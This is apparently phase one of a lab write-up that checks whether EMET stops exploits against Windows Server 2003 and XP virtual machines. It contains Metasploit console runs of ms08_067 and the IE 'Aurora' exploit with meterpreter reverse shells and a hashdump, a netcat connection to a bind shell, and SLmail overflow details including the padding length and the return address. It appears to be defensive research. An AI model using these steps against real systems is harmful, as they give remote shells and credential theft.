Target: Windows Server 2003 SP2 eng; Host Name: HP-Srv01; IP Address: 192.168.34.135
Vulnerability: CVE-2008-4250 (SMB)
Exploit used: ms08_067_netapi from metasploit

Look at the Metasploit Framework console running on the Linux machine:

msf  exploit(ms08_067_netapi) > info

       Name: Microsoft Server Service Relative Path Stack Corruption
     Module: exploit/windows/smb/ms08_067_netapi
    Version: 16002
   Platform: Windows
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great

Provided by:
  hdm <hdm@metasploit.com>
  Brett Moore <brett.moore@insomniasec.com>
  staylor
  jduck <jduck@metasploit.com>

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOST    192.168.34.135   yes       The target address
  RPORT    445              yes       Set the SMB service port
  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload information:
  Space: 400
  Avoid: 8 characters

Description:
  This module exploits a parsing flaw in the path canonicalization
  code of NetAPI32.dll through the Server Service. This module is
  capable of bypassing NX on some operating systems and service packs.
  The correct target must be used to prevent the Server Service (along
  with a dozen others in the same process) from crashing. Windows XP
  targets seem to handle multiple successful exploitation events, but
  2003 targets will often crash or hang on subsequent attempts. This
  is just the first version of this module, full support for NX bypass
  on 2003, along with other platforms, is still in development.

References:
  https://cvedetails.com/cve/2008-4250/
  https://www.osvdb.org/49243
  https://www.microsoft.com/technet/security/bulletin/MS08-067.mspx
  https://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos

msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.34.132:33899
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.34.135
[*] Meterpreter session 2 opened (192.168.34.132:33899 -> 192.168.34.135:1089) at 2013-06-18 16:23:06 +0200

meterpreter > shell
Process 3792 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>systeminfo        
systeminfo

Host Name:                 HP-SRV01
OS Name:                   Microsoft(R) Windows(R) Server 2003, Enterprise Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Uniprocessor Free
Registered Owner:          hp
Registered Organization:   hp
Product ID:                69713-650-3699384-45501
Original Install Date:     1/20/2013, 12:26:37 AM
System Up Time:            0 Days, 0 Hours, 6 Minutes, 5 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 37 Stepping 5 GenuineIntel ~3466 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna
Total Physical Memory:     511 MB
Available Physical Memory: 305 MB
Page File: Max Size:       1,044 MB
Page File: Available:      844 MB
Page File: In Use:         200 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    hp.local
Logon Server:              N/A
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: Q147222
                           [02]: SP1 - SP
                           [03]: KB914961 - Service Pack
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    Yes
                                 DHCP Server:     192.168.34.254
                                 IP address(es)
                                 [01]: 192.168.34.135

C:\WINDOWS\system32>

Test 1 successful

Test 2
Target: Windows XP SP3 eng; Host Name: HP-CLI01; IP Address: 192.168.34.134
Vulnerability: CVE-2008-4250 (IE6)
Exploit used: ms10_002_aurora from metasploit

On the Linux machine I start an HTTP server with the evil page (https://192.168.34.132:8080/evil) using Metasploit:

Module options (exploit/windows/browser/ms10_002_aurora):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     /evil            no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.34.132   yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.34.132:4444
[*] Using URL: https://0.0.0.0:8080/evil
[*]  Local IP: https://192.168.34.132:8080/evil
msf  exploit(ms10_002_aurora) > [*] Server started.
...
...

Now on the target machine I start Internet Explorer 6 and browse to the evil page, and the msf console continues:

...
...
[*] 192.168.34.134   ms10_002_aurora - Sending Internet Explorer "Aurora" Memory Corruption
[*] Sending stage (752128 bytes) to 192.168.34.134
[*] Meterpreter session 1 opened (192.168.34.132:4444 -> 192.168.34.134:1145) at 2013-06-18 17:00:56 +0200

msf  exploit(ms10_002_aurora) > sessions

Active sessions
===============

  Id  Type                   Information               Connection
  --  ----                   -----------               ----------
  1   meterpreter x86/win32  HP-CLI01\user @ HP-CLI01  192.168.34.132:4444 -> 192.168.34.134:1145 (192.168.34.134)

msf  exploit(ms10_002_aurora) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : HP-CLI01
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > hashdump

meterpreter > shell
Process 220 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user\Desktop>systeminfo
systeminfo

Host Name:                 HP-CLI01
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Uniprocessor Free
Registered Owner:          honeypot
Registered Organization:   honeypot
Product ID:                76487-640-1479176-23404
Original Install Date:     1/23/2013, 11:06:09 AM
System Up Time:            0 Days, 0 Hours, 9 Minutes, 4 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 37 Stepping 5 GenuineIntel ~3465 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT-08:00) Pacific Time (US & Canada); Tijuana
Total Physical Memory:     511 MB
Available Physical Memory: 38 MB
Virtual Memory: Max Size:  2,048 MB
Virtual Memory: Available: 2,008 MB
Virtual Memory: In Use:    40 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\HP-CLI01
Hotfix(s):                 5 Hotfix(s) Installed.
                           [01]: File 1
                           [02]: File 1
                           [03]: Q147222
                           [04]: KB942288-v3 - Update
                           [05]: KB954550-v5 - Update
NetWork Card(s):           1 NIC(s) Installed.
                           [01]: VMware Accelerated AMD PCNet Adapter
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    Yes
                                 DHCP Server:     192.168.34.254
                                 IP address(es)
                                 [01]: 192.168.34.134

C:\Documents and Settings\user\Desktop>

Test 2 successful

Test 3
Target: Windows XP SP3 eng; Host Name: HP-CLI01; IP Address: 192.168.34.134
Vulnerability: CVE-2003-0264 (slmail55_4433)
Exploit used: my version of this well known exploit

Take a look at the target machine:

C:\Documents and Settings\user>ipconfig | findstr Address
        IP Address. . . . . . . . . . . . : 192.168.34.134

C:\Documents and Settings\user>hostname
hp-cli01

C:\Documents and Settings\user>netstat /na | findstr LISTENING
  TCP    0.0.0.0:25             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:79             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:106            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:110            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:180            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1034           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1028         0.0.0.0:0              LISTENING
  TCP    127.0.0.1:8376         0.0.0.0:0              LISTENING
  TCP    192.168.34.134:139     0.0.0.0:0              LISTENING

Now, let’s run the exploit from the attacker machine and re-run netstat:

C:\Documents and Settings\user>netstat /na | findstr LISTENING
  TCP    0.0.0.0:25             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:79             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:106            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:110            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:180            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1034           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1028         0.0.0.0:0              LISTENING
  TCP    127.0.0.1:8376         0.0.0.0:0              LISTENING
  TCP    192.168.34.134:139     0.0.0.0:0              LISTENING

The payload of the exploit was a bind shell on port 4444; indeed, a TCP listener is now running on this port.
From the Linux machine I am able to connect to this listener and get a remote shell:

root@bt:~# nc -v 192.168.34.134 4444
192.168.34.134: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.34.134] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\SLmail\System>systeminfo
systeminfo

Host Name:                 HP-CLI01
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Uniprocessor Free
Registered Owner:          honeypot
Registered Organization:   honeypot
Product ID:                76487-640-1479176-23404
Original Install Date:     1/23/2013, 11:06:09 AM
System Up Time:            0 Days, 0 Hours, 32 Minutes, 0 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 37 Stepping 5 GenuineIntel ~3466 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT-08:00) Pacific Time (US & Canada); Tijuana
Total Physical Memory:     511 MB
Available Physical Memory: 299 MB
Virtual Memory: Max Size:  2,048 MB
Virtual Memory: Available: 2,008 MB
Virtual Memory: In Use:    40 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 5 Hotfix(s) Installed.
                           [01]: File 1
                           [02]: File 1
                           [03]: Q147222
                           [04]: KB942288-v3 - Update
                           [05]: KB954550-v5 - Update
NetWork Card(s):           1 NIC(s) Installed.
                           [01]: VMware Accelerated AMD PCNet Adapter
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    Yes
                                 DHCP Server:     192.168.34.254
                                 IP address(es)
                                 [01]: 192.168.34.134

C:\Program Files\SLmail\System>

The following screenshot shows the exploit in action:

Image 1


Let’s go back a few steps, debug the exploit and look at Image 2.

Image 2


The EIP is overwritten after 4654 bytes of padding (\x41, ASCII A) and, in the 4 bytes of the EIP (\x42, ASCII B), I will put the return address ‘\x53\x93\x42\x7E’, which points to an exact address inside user32.dll. This will surely work only under the same OS version (every Windows XP SP3 eng), that is, where the user32.dll version and address space are the same.
If I understand how EMET works, it will often change the address space of user32.dll, de facto invalidating the exploit, or rather causing the application to crash.

[end of phase 1] Take a look at the [phase 2]
